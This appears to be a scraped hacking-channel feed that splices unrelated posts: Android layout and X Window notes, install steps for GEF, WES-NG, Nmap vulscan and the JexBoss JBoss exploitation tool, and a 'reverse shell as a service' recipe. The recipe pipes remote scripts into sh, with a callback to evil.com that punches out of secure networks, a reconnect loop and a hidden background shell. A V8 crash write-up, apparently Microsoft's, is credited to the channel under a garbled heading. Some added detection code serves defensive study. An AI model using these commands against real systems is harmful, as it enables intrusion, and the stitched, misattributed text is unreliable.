UNDERCODE COMMUNITY
@UndercodeCommunity

🦑 Let's send some good scripts for beginners
2020 updated script: you can use setupTermuxArch.bash to install Arch Linux in Amazon, Android, Chromebook and Windows


π•€π•Ÿπ•€π•₯π•’π•π•π•šπ•€π•’π•₯π•šπ• π•Ÿ & β„π•¦π•Ÿ :

1) git clone https://github.com/SDRausty/TermuxArch

2) cd TermuxArch

3) bash setupTermuxArch.bash

4) startarch
That's all!

🦑 Five Android layouts: FrameLayout, LinearLayout, AbsoluteLayout, RelativeLayout, and TableLayout: Part 1
> The Android SDK defines multiple layouts to make it easier for users to design the UI. The layout classes are subclasses of the ViewGroup class; the class structure is shown in the picture after this chat.

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹

1) FrameLayout

> FrameLayout, also known as single-frame layout, is the simplest of the layouts provided by Android. It reserves a blank area on the screen and fills it with a single object, for example a picture, text or a button.

2) Application developers cannot specify positions for components placed in a FrameLayout. By default these components are fixed in the upper left corner of the screen, and each later component is drawn on top of the previous one, partially or completely covering it.

3) Developers can adjust a component's position through the component's android:layout_gravity attribute.

4) The example FrameLayoutDemo demonstrates the layout effect of FrameLayout. There are 4 TextView components in the layout. The first 3 components are placed with the default settings; the fourth is placed after modifying its layout_gravity attribute.

🦑 Part of the layout file main.xml in the example FrameLayoutDemo is as follows:
<?xml version="1.0" encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_height="fill_parent"
    android:layout_width="fill_parent">

    <TextView
        android:id="@+id/text1"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:textColor="#00ff00"
        android:textSize="100dip"
        android:text="@string/first" />
    <TextView
        android:id="@+id/text2"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:textColor="#00ffff"
        android:textSize="70dip"
        android:text="@string/second" />
    <TextView
        android:id="@+id/text3"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:textColor="#ff0000"
        .....
    ...
</FrameLayout>
Of these attributes:
android:layout_width="wrap_content"
....

🦑 LinearLayout

> LinearLayout, also known as linear layout, is probably the most commonly used layout in Android view design. It arranges the components placed in it neatly in a horizontal or vertical line. The direction is specified by the android:orientation attribute, and the weight of each component within the layout is set by its weight attribute.

> The strings.xml file in the example LinearLayoutDemo is as follows:
<?xml version="1.0" encoding="UTF-8"?>
<resources>
    <string name="app_name">LinearLayoutDemo</string>
    <string name="red">red</string>
    <string name="yellow">yellow</string>
    ...
</resources>

Written by UndercOde

🦑 General X Window Options > commands:

🦑 LET'S START:

> Descriptions of the commands of the X Window System. These commands share a common set of parameters. Instead of listing these parameters in the description of each command, we list them here.
> General X Window Options

PARAMETER                VALUE                  DESCRIPTION
-background              red green blue         Setting the background color
-background color                               Setting the background color of the window
-bg color                                       Setting the background color of the window
-display                 system:server_number   Using an X server with the given number (usually 0) on the given system
-fg color                                       Setting the primary color of the window
-fn font                                        Using the specified font
-font font                                      Using the specified font
-foreground              red green blue         Setting the primary color of the window
-foreground color                               Setting the primary color of the window
-geometry                widthxheight+x+y       Setting the window size and location
-geometry widthxheight                          Setting the window size
-geometry +x+y                                  Setting the position of the upper left corner of the window
-height lines                                   Setting the window size vertically, in rows
-position x y                                   Setting the position of the upper left corner of the window, in pixels

🦑 2020 updated GEF - GDB Enhanced Features for exploit devs & reversers
> GEF (pronounced ʁɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old-school GDB. It adds features to GDB through its Python API to assist during dynamic analysis and exploit development. Application developers will also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding repeating traditional commands and bringing out the relevant information from the debugging runtime.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

# via the install script
1) wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

# manually
2) wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py

3) echo source ~/.gdbinit-gef.py >> ~/.gdbinit
Then just start playing:

4) gdb -q /path/to/my/bin
gef➤ gef help

🦑 Features:

A few of GEF features include:

> One single GDB script.

> Entirely OS-agnostic, no dependencies: GEF is batteries-included and installable in 2 seconds (unlike PwnDBG).

> Fast: limits the number of dependencies and optimizes code to make the commands as fast as possible (unlike PwnDBG).

> Provides a great variety of commands to drastically change your experience in GDB.

> Easily extendable to create other commands by providing a more comprehensible layout to the GDB Python API.

> Works consistently on both Python2 and Python3.

> Built around an architecture abstraction layer, so all commands work on any GDB-supported architecture such as x86-32/64, ARMv5/6/7, AARCH64, SPARC, MIPS, PowerPC, etc. (unlike PEDA)

> Suited for real-life application debugging and exploit development just as much as for CTFs (unlike PEDA or PwnDBG)


🦑 2020 Windows Exploit Suggester - Next Generation (WES-NG)
> WES-NG provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) On your Linux machine:

> git clone https://github.com/bitsadmin/wesng

2) cd wesng

> Obtain the latest database of vulnerabilities by executing the command wes.py --update.

3) Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect it to a file: systeminfo > systeminfo.txt

4) Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities it is currently exposed, including exploits if available.

5) As the data provided by Microsoft's MSRC feed is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to interpret the results. For an overview of all available parameters, check CMDLINE.md.


🦑 UPDATED Advanced vulnerability scanning with Nmap NSE
> Vulscan is a module which turns Nmap into a vulnerability scanner. The Nmap option -sV enables version detection per service, which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Install the files into the following folder of your Nmap installation:

Nmap\scripts\vulscan\*

2) Clone the GitHub repository like this:

git clone https://github.com/scipag/vulscan scipag_vulscan

3) ln -s $(pwd)/scipag_vulscan /usr/share/nmap/scripts/vulscan

4) nmap -sV --script=vulscan/vulscan.nse www.example.com

🦑 Single Database Mode
You may execute vulscan with the following argument to use a single database:

--script-args vulscandb=your_own_database

It is also possible to create and reference your own databases. This requires creating a database file, which has the following structure:

<id>;<title>

> Then execute vulscan just as you would when referring to one of the pre-delivered databases. Feel free to share your own database and vulnerability connection with me, to add it to the official repository.

🦑 Vulnerability Database
There are the following pre-installed databases available at the moment:

> scipvuldb.csv - https://vuldb.com

> cve.csv - https://cve.mitre.org

> securityfocus.csv - https://www.securityfocus.com/bid/

> xforce.csv - https://exchange.xforce.ibmcloud.com/

> exploitdb.csv - https://www.exploit-db.com

> openvas.csv - http://www.openvas.org

> securitytracker.csv - https://www.securitytracker.com (end-of-life)

> osvdb.csv - http://www.osvdb.org (end-of-life)

🦑 Java Deserialization Vulnerabilities: verification and exploitation tool
> JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms, frameworks and applications.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

A) Installation on Linux/Mac
To install the latest version of JexBoss, please use the following commands:

1) git clone https://github.com/joaomatosf/jexboss.git

2) cd jexboss

3) pip install -r requires.txt

4) python jexboss.py -h

5) python jexboss.py -host http://target_host:8080

OR:

6) Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip

7) unzip master.zip

8) cd jexboss-master

9) pip install -r requires.txt

10) python jexboss.py -h

11) python jexboss.py -host http://target_host:8080

> If you are using CentOS with Python 2.6, please install Python 2.7.

B) Example installation of Python 2.7 on CentOS using Software Collections (scl):

1) yum -y install centos-release-scl

2) yum -y install python27

3) scl enable python27 bash

🦑 Installation on Windows
If you are using Windows, you can use Git Bash to run JexBoss. Follow the steps below:

1) Download and install Python

2) Download and install Git for Windows
After installing, run Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
3) git clone https://github.com/joaomatosf/jexboss.git

4) cd jexboss

5) pip install -r requires.txt

6) python jexboss.py -h

7) python jexboss.py -host http://target_host:8080


🦑 The exploitation vectors are:

/admin-console
tested and working in JBoss versions 5 and 6

/jmx-console
tested and working in JBoss versions 4, 5 and 6

/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6

/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6

Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters

Servlet Deserialization
tested and working against multiple Java applications, platforms, etc., via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)

Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications

🦑 Tested by UndercOde on

> Debian


🦑 Reverse Shell as a Service (topic updated)

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> git clone https://github.com/lukechilds/reverse-shell
1) Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.

> nc -l 1337

2) Execute reverse shell on target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.

3) curl https://shell.now.sh/192.168.0.69:1337 | sh

4) Go back to your machine, you should now have a shell prompt.

🦑 Hostname

> You can use a hostname instead of an IP.

1) curl https://shell.now.sh/localhost:1337 | sh

🦑 Remote connections
Because this is a reverse connection it can punch through firewalls and connect out to the internet.

2) You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with:

> curl https://shell.now.sh/evil.com:1337 | sh

3) Reconnecting
By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.

while true; do curl https://shell.now.sh/yourip:1337 | sh; done

4) Running as a background process

> Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.

sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit

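As a defensive counterpart to the recipe above (an added example written for this page, not code from the reverse-shell project): a small scanner that flags download-and-pipe-to-shell command lines, reconnect loops and backgrounded interactive shells in command records, and extracts the host:port the generated shell would call back to. The history entries are constructed sample data.

```python
"""Detect the "download and pipe to shell" pattern from the recipe above in
command-line records (shell history, auditd execve, EDR telemetry).
Sample data below is constructed for this example."""
import re
from dataclasses import dataclass
from typing import List, Optional

# A downloader whose output goes, via a pipe, straight into a shell.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(sh|bash|dash|zsh|ksh)\b")
# URL whose first path segment is host:port, the shape shell.now.sh uses
# to tell the generated script where to connect back.
HOST_PORT_PATH = re.compile(r"https?://[^\s/]+/([A-Za-z0-9.\-]+):(\d{1,5})\b")
RECONNECT_LOOP = re.compile(r"\bwhile\s+true\s*;\s*do\b.*\bdone\b")
BACKGROUND_INTERACTIVE = re.compile(r"\b(sh|bash)\s+-i\s*&")


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: List[str]
    callback: Optional[str]  # host:port the shell would connect back to


def analyse_command(line_no: int, command: str) -> Optional[Finding]:
    """Return a Finding for a suspicious command line, else None."""
    reasons = []
    piped = PIPE_TO_SHELL.search(command) is not None
    if piped:
        reasons.append("remote content piped into a shell")
    if piped and RECONNECT_LOOP.search(command):
        reasons.append("pipe-to-shell wrapped in a reconnect loop")
    if BACKGROUND_INTERACTIVE.search(command):
        reasons.append("interactive shell detached into the background")
    if not reasons:
        return None
    m = HOST_PORT_PATH.search(command)
    callback = f"{m.group(1)}:{m.group(2)}" if m else None
    return Finding(line_no, command, reasons, callback)


def scan(commands: List[str]) -> List[Finding]:
    """Run analyse_command over every record, numbering from 1."""
    findings = []
    for n, cmd in enumerate(commands, 1):
        f = analyse_command(n, cmd)
        if f is not None:
            findings.append(f)
    return findings


# Constructed history: the three command shapes from the recipe plus two
# benign lines (plain ls, curl piped into grep) that must not be flagged.
SAMPLE_HISTORY = [
    "ls -la /var/log",
    "curl https://shell.now.sh/192.168.0.69:1337 | sh",
    "curl -s https://example.com/index.html | grep -c href",
    "while true; do curl https://shell.now.sh/yourip:1337 | sh; done",
    'sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {'; '.join(f.reasons)} -> callback {f.callback}")
```

The callback value is what you would pivot on next: an egress-firewall or DNS log lookup for that host and port tells you whether the connection ever completed.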

🦑 Microsoft finds Google Chrome vulnerability, Google finds Microsoft Edge vulnerability, full write-up by underc0de:
> Security is now a powerful differentiator in picking the right browser. We all use browsers for everyday activities, such as staying in touch with loved ones, editing sensitive private and corporate documents, and even managing our financial assets. A single compromise through a web browser can have disastrous consequences. At the same time, the browser is also becoming one of the most sophisticated pieces of consumer software available, increasing the potential attack surface.

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Find and exploit remote vulnerabilities

> Usually, we do this by discovering memory corruption bugs, such as buffer overflows or use-after-free vulnerabilities.

2) As with any web browser, the attack surface is extensive, including the V8 JavaScript engine, the Blink DOM engine, and the PDFium PDF renderer. For this project, we focused on V8.

3) The bugs we ultimately used for our exploit were discovered through fuzzing. We used the Azure-based fuzzing infrastructure of the Windows Security Assurance team to run ExprGen, an internal JavaScript fuzzer written by the team behind Chakra (our own JavaScript engine). People have likely thrown all the public fuzzers at V8; ExprGen, on the other hand, had only ever been run on Chakra, giving it more opportunities to lead to new bugs.

🦑 1) Recognizing the error
One disadvantage of fuzzing compared to manual code review is that it is not always immediately clear what causes a given test case to trigger a vulnerability, or whether the unexpected behavior even constitutes a vulnerability.

2) This is especially true for us at OSR; we don't have any experience working with V8, so we knew little about its internals. In this case, the test cases generated by ExprGen reliably crashed V8, but not always in the same way, and not in a way that an attacker could easily influence.

3) Since fuzzers often generate very large and complex code (in this case, nearly 1,500 lines of unreadable JavaScript), the first step is usually to minimize the test case, trimming fat until we are left with a small, understandable piece of code. This is underc0de's final conclusion:

> It looks weird and doesn't really do anything, but it is valid JavaScript. All it does is create a strangely structured object and then set some of its fields. This should not trigger any strange behavior, but it does. When running this code with d8, the standalone executable version of V8, built from git tag 6.1.5534.32, we get a crash.

> Looking at the address where the crash occurred (0x000002d168004f14), we can tell it is not in a static module. Therefore, it must be code dynamically generated by the V8 Just-In-Time (JIT) compiler. We also see that the crash happens because the rax register is zero.

> This looks like a classic null dereference bug, which would be a letdown: usually not exploitable, because modern operating systems prevent the zero virtual address from being mapped.

+ Check out picture

> Our crash happened just before a function call, and the surrounding code looked like a JavaScript function dispatcher stub, mainly because the address of v8::internal::Builtin_FunctionPrototypeToString was loaded into a register before the call. Looking at the code of the function located at 0x000002d167e84500, we find that the address 0x000002d167e8455f does contain a call rbx instruction, which seems to confirm our suspicion.

written by UndercOde
4) This does not produce very useful information.

5) We can see that most of these values are pointers, but that's about it. However, knowing the location of the value (which is supposed to be a pointer) is useful, because it can help us figure out why this value is zero in the first place. Using WinDbg's new Time Travel Debugging (TTD) feature, we can place a memory write breakpoint at this location (baw 8 0000025e`a6845dd0), then place an execution breakpoint at the beginning of the function, and finally run backwards (g-).

6) Interestingly, our memory write breakpoint is not triggered, which means that this memory slot is not initialized in this function, or at least not before it is used. This may be normal, but if we play with the test case, for example by replacing the line obbc.bca.bcab = 0; with obbc.bca.bcab = 0xbadc0de;, then we start to notice changes in the memory area where our crash value lives.

written by UndercOde

🦑 ISSUE 2 IN EXPLORER AND CHROME: creating crashes in browsers:
At this stage of the optimization process, the code looks perfectly reasonable:

1) Allocate a memory block to store the local object obba (node 235), and initialize its fields baa and bab

2) Allocate a memory block to store the local object ob (node 259), and initialize its fields, where ba is initialized with a reference to the previous obba allocation

3) Allocate a memory block to store the local object o (node 303), and initialize its fields

4) Field b of local object o is overwritten with a reference to object ob (node 185)

5) Local object field obba.bab is loaded (nodes 199, 209 and 212), and the Object.toString method is called with obba.bab as its first parameter

6) Code compiled at this stage of the optimization pipeline does not appear to exhibit the uninitialized-local-variable behavior which we assume is the root cause of the bug.

7) Having said that, some aspects of this representation can back up our hypothesis. Looking at nodes 209 and 212, which load obba and obba.bab as function call parameters, we can see that the offsets +24 and +32 correspond to the disassembly of the crash.

8) 0x17 and 0x1f are 23 and 31, respectively. This is explained by how V8's value tagging distinguishes an actual object from an inline integer (SMI): if a value representing a JavaScript variable has its least significant bit set, it is treated as a pointer to an object, otherwise it is an SMI. Therefore, V8's optimized code subtracts one from the JavaScript object field offset before using it for dereferencing.

written by UndercOde
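Added example (written for this page, not V8's own code): a model of the tagging rule just described. The SMI encoding (value << 1), the unmapped low-address range and the heap addresses are assumptions chosen for the demonstration; it shows why the -1 folded into the +24 and +32 field offsets yields 0x17 and 0x1f, and why a load through a slot that was never initialized ends up reading near address zero.

```python
"""Simplified model of the value tagging described above: a word with its
least significant bit set is a pointer to a heap object, otherwise it is an
inline small integer (SMI). Written for this page; not V8's own code. The
SMI encoding (value << 1), the unmapped low-address range and the heap
addresses are assumptions chosen for the demonstration."""
from typing import Dict, Tuple

WORD_BITS = 64
MASK = (1 << WORD_BITS) - 1
UNMAPPED_BELOW = 0x10000  # assumption: the OS never maps the lowest pages


class AccessViolation(Exception):
    pass


def tag_smi(value: int) -> int:
    """Encode an integer as an SMI: shifted left, low bit clear."""
    return (value << 1) & MASK


def tag_object(address: int) -> int:
    """Encode a heap pointer: object addresses are aligned, so bit 0 is free."""
    assert address % 2 == 0, "object addresses must be at least 2-byte aligned"
    return address | 1


def is_smi(word: int) -> bool:
    return word & 1 == 0


def smi_value(word: int) -> int:
    """Decode an SMI, restoring the sign of the 63-bit payload."""
    assert is_smi(word)
    v = word >> 1
    return v - (1 << (WORD_BITS - 1)) if v & (1 << (WORD_BITS - 2)) else v


def field_displacement(field_offset: int) -> int:
    """Displacement the optimizing compiler folds into a field load through a
    tagged pointer: the -1 that removes the tag is merged with the offset, so
    +24 becomes 0x17 and +32 becomes 0x1f, as in the crash disassembly."""
    return field_offset - 1


def jit_load_field(memory: Dict[int, int], tagged_ptr: int, field_offset: int) -> int:
    """Model of the optimized load: no tag check, because the compiler already
    assumed the value is an object; faults if the address is unmapped."""
    address = (tagged_ptr + field_displacement(field_offset)) & MASK
    if address < UNMAPPED_BELOW:
        raise AccessViolation(f"access violation reading 0x{address:x}")
    return memory.get(address, 0)


def demo() -> Tuple[int, str]:
    """Load obba.bab through ob.ba (offsets +24 and +32) once with ob.ba
    initialized, and once with the initialization dropped so the slot reads 0."""
    memory: Dict[int, int] = {}
    obba = 0x2D168004F00  # constructed heap addresses, 8-byte aligned
    ob = 0x2D168004F40
    memory[obba + 32] = tag_smi(3)        # obba.bab = 3
    memory[ob + 24] = tag_object(obba)    # ob.ba -> obba
    ok = jit_load_field(memory, jit_load_field(memory, tag_object(ob), 24), 32)
    memory[ob + 24] = 0                   # the store was optimized away
    try:
        jit_load_field(memory, jit_load_field(memory, tag_object(ob), 24), 32)
        fault = "no fault"
    except AccessViolation as exc:
        fault = str(exc)  # register holds 0, load hits 0x1f in the zero page
    return smi_value(ok), fault
```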
🦑 These tutorials cover browser crash bugs, for developers or hackers with a little experience.

🦑 HOW DO CRASH CODES WORK IN BROWSERS?
There are two significant differences:

1) The code no longer bothers loading o and then ob; it is optimized to reference ob directly, probably because the value of the field never changes

2) The code no longer initializes obba; as can be seen in the figure, TurboFan grays out node 264, which means that it is no longer live, so it will not be built into the final code

3) Looking at all active nodes seems to confirm that this field is no longer initialized. As another sanity check, we run d8 on this test case with the --no-turbo-escape flag to omit this optimization phase: d8 no longer crashes, confirming that this is the problem.
written by UndercOde